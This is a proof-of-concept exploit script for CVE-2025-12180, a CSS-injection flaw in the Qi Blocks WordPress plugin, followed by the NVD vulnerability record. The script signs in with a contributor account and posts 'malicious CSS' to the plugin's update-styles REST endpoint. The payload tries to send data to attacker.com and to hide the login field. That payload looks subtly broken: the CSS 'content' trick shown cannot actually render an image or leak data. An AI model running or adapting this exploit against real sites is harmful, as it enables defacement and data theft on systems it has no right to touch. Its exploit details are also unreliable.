CVE-2025-12180

import requests import json # CVE-2025-12180 PoC - CSS Injection in Qi Blocks WordPress Plugin # Target: WordPress site with Qi Blocks plugin <= 1.4.3 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" # Step 1: Authenticate and get nonce/cookies login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() # Step 2: Get REST API nonce via wp-api api_nonce_url = f"{TARGET_URL}/wp-json/wp/v2/users/me" auth_response = session.get(api_nonce_url, auth=(USERNAME, PASSWORD)) # Step 3: Inject malicious CSS via REST API endpoint inject_url = f"{TARGET_URL}/wp-json/qi-blocks/v1/update-styles" # Malicious CSS payload - CSS injection for data exfiltration malicious_css = """ body::before { content: "<img src='https://attacker.com/log?data=' attr(class) '>"; display: block; } input[name="log"] { display: none; } """ payload = { "global_styles": malicious_css, "style_id": "malicious-style-1" } headers = { "Content-Type": "application/json", "X-WP-Nonce": session.cookies.get("wp-rest") or "" } response = session.post(inject_url, json=payload, headers=headers) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") # Step 4: Verify injection (check if CSS is applied to pages) if response.status_code in [200, 201]: print("[+] CSS injection successful!") print("[+] Malicious CSS has been stored and will be rendered on pages.") else: print("[-] Injection failed. Check authentication or plugin version.")

{"cve": {"id": "CVE-2025-12180", "sourceIdentifier": "[email protected]", "published": "2025-11-01T06:15:40.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Qi Blocks plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.4.3. This is due to the plugin storing arbitrary CSS styles submitted via the `qi-blocks/v1/update-styles` REST API endpoint without proper sanitization in the `update_global_styles_callback()` function. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary CSS, which can be used to perform actions such as hiding content, overlaying fake UI elements, or exfiltrating sensitive information via CSS injection techniques."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/qi-blocks/tags/1.4.3/inc/admin/global-styles/class-qi-blocks-framework-global-styles.php#L145", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3387712/qi-blocks/trunk/inc/admin/global-styles/class-qi-blocks-framework-global-styles.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/42e63318-661e-465d-919f-df0635ea1a6d?source=cve", "source": "[email protected]"}]}}